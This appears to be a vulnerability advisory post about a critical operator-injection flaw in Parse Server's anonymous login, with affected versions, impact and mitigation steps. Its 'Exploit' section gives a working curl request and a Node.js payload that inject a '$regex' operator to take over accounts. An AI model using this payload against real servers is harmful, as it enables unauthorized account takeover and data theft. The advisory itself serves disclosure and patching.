Listen to this Post
An unauthenticated attacker can take over any user account created with an authentication provider that does not validate the format of the user identifier (e.g., anonymous authentication), which is enabled by default. By sending a crafted login request, the attacker injects MongoDB or PostgreSQL operators into the `authData.id` field. This manipulates the server into performing a pattern-matching query (like a regular expression) instead of an exact-match lookup for the user. This allows the attacker to match an existing user account and obtain a valid session token, completely bypassing authentication for both database backends .
Platform: Parse Server
Version: <8.6.38, >=9.0.0 <9.6.0-alpha.12
Vulnerability: Operator Injection
Severity: Critical
Date: March 12, 2026
Prediction: Patch already available
What Undercode Say:
Analytics:
The vulnerability affects all Parse Server deployments with anonymous authentication enabled (default). Both MongoDB and PostgreSQL backends are vulnerable. The attack requires no authentication and no user interaction, making it highly automatable with a Critical CVSS score. The issue stems from insufficient type validation on the authentication identifier, allowing it to be treated as a MongoDB/PostgreSQL operator object instead of a string.
Exploit:
Example cURL command exploiting the vulnerability (Conceptual)
The attacker injects a regex operator to match any existing user
curl -X POST https://your-parse-server.com/parse/login \
-H "X-Parse-Application-Id: YOUR_APP_ID" \
-H "Content-Type: application/json" \
-d '{
"_method": "POST",
"authData": {
"anonymous": {
"id": { "$regex": "^" } // Injected operator to match first user
}
}
}'
// Node.js exploit concept
const maliciousPayload = {
authData: {
anonymous: {
id: { $regex: "^" } // Matches any existing anonymous user
}
}
};
// This would return a valid session token for the first matched user
fetch('https://target.parse-server.com/parse/login', {
method: 'POST',
headers: {
'X-Parse-Application-Id': 'app_id',
'Content-Type': 'application/json'
},
body: JSON.stringify(maliciousPayload)
});
Protection from this CVE:
- Immediately upgrade to patched versions: 8.6.38 or 9.6.0-alpha.12.
- If immediate upgrade is not possible, disable anonymous authentication as a temporary mitigation:
// In your Parse Server initialization const api = new ParseServer({ // ... other config auth: { anonymous: { enabled: false // Disable anonymous auth } } });
3. Verify your current version:
npm list parse-server or cat package.json | grep parse-server
4. Upgrade command:
npm install [email protected] or for v9 users on alpha channel npm install [email protected]
Impact:
Complete account takeover of any user that used anonymous authentication. Attackers can gain unauthorized access to user data, perform actions on behalf of victims, and potentially escalate privileges if the compromised account has administrative roles. The vulnerability affects both MongoDB and PostgreSQL deployments. The attack is silent and leaves no obvious traces in standard logs as it mimics a successful login event .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

